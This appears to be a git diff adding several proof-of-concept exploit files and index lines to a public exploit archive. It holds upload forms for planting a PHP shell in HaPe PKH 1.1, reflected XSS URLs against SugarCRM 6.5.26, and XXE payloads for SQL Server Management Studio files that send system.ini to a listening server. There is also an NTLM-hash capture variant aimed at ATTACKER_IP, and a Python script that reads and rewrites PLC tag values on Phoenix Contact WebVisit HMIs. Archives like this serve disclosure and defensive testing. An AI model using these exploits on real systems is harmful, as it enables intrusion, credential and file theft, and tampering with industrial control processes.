+++ b/exploits/php/webapps/45593.txt
@@ -0,0 +1,63 @@
+# Exploit Title: HaPe PKH 1.1 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-12
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.sitejo.id
+# Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download
+# Version: 1.1 
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# File => Shell.php
+# Upload Path => http://localhost/[PATH]/gambar-konten/9Shell.php
+# 
+# $foto_ksm = array(
+#  array('id_foto' => '7','id_pengurus' => '','foto' => '9Shell.php','kategori_foto' => 'Foto Profile','hari' => 'Kamis',
+# 'tgl' => '2018-10-12','jam' => '01:58:48'));
+
+<form method="POST" action="http://localhost/hape-pkh/admin/modul/mod_pengurus/aksi_foto.php?module=pengurus&act=input" enctype="multipart/form-data">
+<input name="id_art" type="hidden">
+<input name="id_pengurus" value="" type="hidden">
+<input name="fupload" size="30" accept="image/*" type="file">
+<input name="kategori_foto" value="Foto Profile" checked="" type="radio">
+<input name="kategori_foto" value="Depan" type="radio">
+<input name="kategori_foto" value="Belakang" type="radio">
+<input name="kategori_foto" value="Samping" type="radio">
+<input name="kategori_foto" value="Dalam" type="radio">
+<input class="button" value="Kembali" onclick="window.location.href='?module=pengurus&act=editpengurus&id=';" type="button">
+<input class="button" value="Upload" type="submit">
+</form>
+
+# 2)
+# File => Shell.php
+# Upload Path => http://localhost/hape-pkh/gambar-konten/14Shell.php
+# 
+# $admin = array(
+#  array('id_user' => '1','nama_lengkap' => '','jk' => '','tempat' => '','tl' => '0000-00-00','alamat' => '',
+# 'id_desa' => '','no_telp' => '','email' => '','username' => 'admin',
+# 'password' => '21232f297a57a5a743894a0e4a801fc3','level' => 'admin',
+# 'blokir' => '','foto' => '14Shell.php'));
+
+<form method="POST" enctype="multipart/form-data" action="http://localhost/hape-pkh/admin/modul/mod_user/aksi_user.php?module=user&act=update">
+<input name="id_user" value="1" type="hidden">
+<input name="username" value="admin" disabled=""> 
+<input name="fupload" size="30" type="file">
+<input value="Update" type="submit">
+</form>
+
+# 3)
+# File => Shell.php
+# Upload Path => http://localhost/hape-pkh/gambar-konten/Shell.php
+# 
+# $kecamatan = array(array('id_kecamatan' => '1','kecamatan' => '','alamat' => '',
+# 'email' => '','telp' => '','kab' => '','provinsi' => '','kodepos' => '',
+# 'ket' => '','foto' => 'Shell.php'));
+
+<form method="POST" enctype="multipart/form-data" action="http://localhost/hape-pkh/admin/modul/mod_kecamatan/aksi_kecamatan.php?module=kecamatan&act=update">
+<input name="id" value="1" type="hidden">
+<input class="input" name="fupload" size="30" accept="image/*" type="file">
+<input class="button" value="Update" type="submit"></td></tr>
+</form>
\ No newline at end of file
diff --git a/exploits/php/webapps/45594.txt b/exploits/php/webapps/45594.txt
new file mode 100644
index 000000000..73fe2feab
--- /dev/null
+++ b/exploits/php/webapps/45594.txt
@@ -0,0 +1,26 @@
+# Exploit Title: SugarCRM 6.5.26 - Cross-Site Scripting
+# Date: 2018-09-29
+# Exploit Author: Purplemet Security
+# Author Website: https://www.purplemet.com/
+# Vendor Homepage: https://www.sugarcrm.com/
+# Software Link: https://sourceforge.net/projects/sugarcrm/
+# Version: 6.5.26
+# Tested on: Ubuntu 16.04
+# CVE : CVE-2018-17784
+
+# Description
+# A vulnerability in uploader.swf, io.swf and flashcanvas.swf in SugarCRM Community Edition 6.5.26 
+# could allow an unauthenticated, remote attacker to conduct a cross-site scripting 
+# (XSS) attack on a targeted system.
+# SugarCRM Community Edition 6.5 had reached its end-of-life and is no longer supported. 
+# 6.5.26 is the last version and no patches will be provided by the vendor.
+
+# PoC:
+# 1) 
+http://192.168.13.37/sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}
+
+# 2) 
+http://192.168.13.37/sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');}
+
+# 3) 
+http://192.168.13.37/sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)}
\ No newline at end of file
diff --git a/exploits/windows/local/45583.txt b/exploits/windows/local/45583.txt
new file mode 100644
index 000000000..4b32725f8
--- /dev/null
+++ b/exploits/windows/local/45583.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
+# Date: 2018-10-10
+# Author: John Page (aka hyp3rlinx)	
+# Website: hyp3rlinx.altervista.org
+# Venodor: www.microsoft.com
+# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)	
+# CVE: CVE-2018-8533
+# References: 
+# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
+# https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
+# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533
+
+# Description
+# This vulnerability allows remote attackers to disclose sensitive information on vulnerable 
+# installations of Microsoft SQL Server Management Studio. User interaction is required to 
+# exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+# The specific flaw exists within the handling of REGSRVR files. Due to the improper 
+# restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the 
+# XML parser to access the URI and embed the contents back into the XML document for further processing.
+# An attacker can leverage this vulnerability to disclose information in the context of the current process.
+
+# Exploit/POC
+
+# 1) python -m SimpleHTTPServer
+
+# 2) "POC.xml"
+
+<?xml version="1.0"?>
+<!DOCTYPE injectme [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+# 3) "payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
+%all;
+
+# Result:
+
+Serving HTTP on 0.0.0.0 port 8000 ...
+127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
+127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
+127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
\ No newline at end of file
diff --git a/exploits/windows/local/45585.txt b/exploits/windows/local/45585.txt
new file mode 100644
index 000000000..f965bc380
--- /dev/null
+++ b/exploits/windows/local/45585.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection
+# Date: 2018-10-10
+# Author: John Page (aka hyp3rlinx)	
+# Website: hyp3rlinx.altervista.org
+# Venodor: www.microsoft.com
+# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)	
+# CVE: CVE-2018-8527
+# References:
+# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
+# https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
+# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527
+
+# Description
+# This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations 
+# of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability 
+# in that the target must visit a malicious page or open a malicious file.
+# The specific flaw exists within the handling of XEL files. Due to the improper restriction 
+# of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser 
+# to access the URI and embed the contents back into the XML document for further processing. An attacker 
+# can leverage this vulnerability to disclose information in the context of the current process.
+
+# [Exploit/POC]
+
+python -m SimpleHTTPServer (listens Port 8000)
+
+"evil.xel" (Extended Event Log File)
+
+<?xml version="1.0"?>
+<!DOCTYPE flavios [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+"payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
+%all;
+
+# OR 
+# Steal NTLM hashes
+# Kali linux
+
+/usr/share/responder/tools
+
+responder -I eth0 -rv
+
+"evil.xel"
+
+<?xml version="1.0"?>
+<!DOCTYPE dirty0tis [ 
+<!ENTITY % dtd SYSTEM "\\ATTACKER_IP\unknown">
+%dtd;]>
+
+Result: Forced authentication and NTLM hash captured
\ No newline at end of file
diff --git a/exploits/windows/local/45587.txt b/exploits/windows/local/45587.txt
new file mode 100644
index 000000000..91a3726c7
--- /dev/null
+++ b/exploits/windows/local/45587.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection
+# Date: 2018-10-10
+# Author: John Page (aka hyp3rlinx)	
+# Website: hyp3rlinx.altervista.org
+# Venodor: www.microsoft.com
+# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)	
+# CVE: CVE-2018-8532
+# References:
+# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt
+# https://www.zerodayinitiative.com/advisories/ZDI-18-1132/
+# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532
+
+# Security Issue
+# This vulnerability allows remote attackers to disclose sensitive information on 
+# vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to 
+# exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+# The specific flaw exists within the handling of XMLA files. Due to the improper restriction of 
+# XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to 
+# access the URI and embed the contents back into the XML document for further processing. An attacker can leverage 
+# this vulnerability to disclose information in the context of the current process.
+
+# PoC
+# 1) python -m SimpleHTTPServer
+# 2) "test.xmla"
+
+<?xml version="1.0"?>
+<!DOCTYPE tastyexploits [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+# 3) "payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
+%all;
+
+# Result:
+
+Serving HTTP on 0.0.0.0 port 8000 ...
+127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
+127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
+127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
\ No newline at end of file
diff --git a/exploits/windows/webapps/45590.py b/exploits/windows/webapps/45590.py
new file mode 100755
index 000000000..c1b08309b
--- /dev/null
+++ b/exploits/windows/webapps/45590.py
@@ -0,0 +1,93 @@
+# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass
+# Date: 2018-09-30
+# Exploit Author: Deneut Tijl
+# Vendor Homepage: www.phoenixcontact.com
+# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
+# Version: WebVisit (all versions)
+# CVE : CVE-2016-8380, CVE-2016-8371
+
+# Description
+# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)
+# Steps:
+# * Get Project Name: http://<ip>/
+# * Get list of tags: http://<ip>/<projectname>.tcr
+# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe
+# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)
+
+# CVE-2016-8380-SetPLCValues.py
+
+#! /usr/bin/env python
+
+import urllib2
+
+strIP = raw_input('Please enter an IP [192.168.1.200]: ')
+if strIP == '': strIP = '192.168.1.200'
+
+try:
+    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
+except urllib2.HTTPError:
+    print('#### Critical Error with IP ' + strIP + ': no response')
+    raw_input('Press Enter to exit')
+    exit()
+
+strProject = ''
+for line in URLResponse.readlines():
+    if 'ProjectName' in line:
+        strProject = line.split('VALUE="')[1].split('"')[0]
+
+if strProject == '':
+    print('#### Error, no \'ProjectName\' found on the main page')
+    raw_input('Press Enter to exit')
+    exit()
+
+print('---- Found project \'' + strProject + '\', retrieving list of tags')
+
+try:
+    TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))
+except urllib2.HTTPError:
+    print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')
+    raw_input('Press Enter to exit')
+    exit()
+
+arrTagList = []
+for line in TagResponse.readlines():
+    if line.startswith('#!-- N ='):
+        intNumberOfTags = int(line.split('=')[1])
+        print('---- There should be ' + str(intNumberOfTags) + ' tags:')
+    if not line.startswith('#'):
+        if not line.split(';')[0].strip() == '':
+            arrTagList.append(line.split(';')[0].strip())
+            print('-- '+line.split(';')[0].strip())
+
+
+raw_input('Press Enter to query them all')
+import os, urllib
+os.system('cls' if os.name == 'nt' else 'clear')
+strPost = '<body>'
+strPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'
+strPost += '<item_list>'
+for item in arrTagList:
+    strPost += '<i><n>' + item + '</n></i>'
+strPost += '</item_list></body>'
+DataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()
+
+arrData = []
+for item in DataResponse.split('<i>'):
+    if '<n>' in item:
+        name = item.split('<n>')[1].split('</n>')[0]
+        value = item.split('<v>')[1].split('</v>')[0]
+        arrData.append((name,value))
+print('----- Full list of tags and their values:')
+i = 0
+for item in arrData:
+    i += 1
+    print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])
+
+ans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')
+if ans1 == '':
+    exit()
+strTag = arrData[int(ans1) - 1][0]
+strVal = arrData[int(ans1) - 1][1]
+ans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')
+if ans2 == '': ans2 = strVal
+urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d8dfccd38..4a0070425 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10028,6 +10028,9 @@ id,file,description,date,author,type,platform,port
 45562,exploits/windows/local/45562.rb,"Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)",2018-10-08,Metasploit,local,windows,
 45573,exploits/linux/local/45573.txt,"ghostscript - executeonly Bypass with errorhandler Setup",2018-10-09,"Google Security Research",local,linux,
 45575,exploits/linux/local/45575.rb,"ifwatchd - Privilege Escalation (Metasploit)",2018-10-09,Metasploit,local,linux,
+45583,exploits/windows/local/45583.txt,"Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
+45585,exploits/windows/local/45585.txt,"Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
+45587,exploits/windows/local/45587.txt,"Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection",2018-10-11,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40098,3 +40101,16 @@ id,file,description,date,author,type,platform,port
 45537,exploits/hardware/webapps/45537.txt,"FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure",2018-10-06,LiquidWorm,webapps,hardware,
 45539,exploits/hardware/webapps/45539.py,"FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure",2018-10-08,LiquidWorm,webapps,hardware,
 45542,exploits/linux/webapps/45542.py,"Imperva SecureSphere 13 - Remote Command Execution",2018-10-08,rsp3ar,webapps,linux,
+45580,exploits/php/webapps/45580.txt,"Wikidforum 2.20 - Cross-Site Scripting",2018-10-11,"Amir Hossein Mahboubi",webapps,php,
+45581,exploits/hardware/webapps/45581.txt,"WAGO 750-881 01.09.18 - Cross-Site Scripting",2018-10-11,SecuNinja,webapps,hardware,
+45582,exploits/php/webapps/45582.txt,"E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection",2018-10-11,"Ihsan Sencan",webapps,php,
+45584,exploits/php/webapps/45584.txt,"jQuery-File-Upload 9.22.0 - Arbitrary File Upload",2018-10-11,"Larry W. Cashdollar",webapps,php,
+45586,exploits/hardware/webapps/45586.py,"Phoenix Contact WebVisit 6.40.00 - Password Disclosure",2018-10-11,Photubias,webapps,hardware,
+45588,exploits/php/webapps/45588.txt,"HaPe PKH 1.1 - 'id' SQL Injection",2018-10-12,"Ihsan Sencan",webapps,php,
+45589,exploits/php/webapps/45589.txt,"LUYA CMS 1.0.12 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,
+45590,exploits/windows/webapps/45590.py,"Phoenix Contact WebVisit 2985725 - Authentication Bypass",2018-10-12,Photubias,webapps,windows,
+45591,exploits/php/webapps/45591.txt,"HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)",2018-10-12,"Ihsan Sencan",webapps,php,
+45592,exploits/php/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,
+45593,exploits/php/webapps/45593.txt,"HaPe PKH 1.1 - Arbitrary File Upload",2018-10-12,"Ihsan Sencan",webapps,php,
+45594,exploits/php/webapps/45594.txt,"SugarCRM 6.5.26 - Cross-Site Scripting",2018-10-12,"Purplemet Security",webapps,php,
+45595,exploits/multiple/webapps/45595.py,"FluxBB < 1.5.6 - SQL Injection",2014-11-21,secthrowaway,webapps,multiple,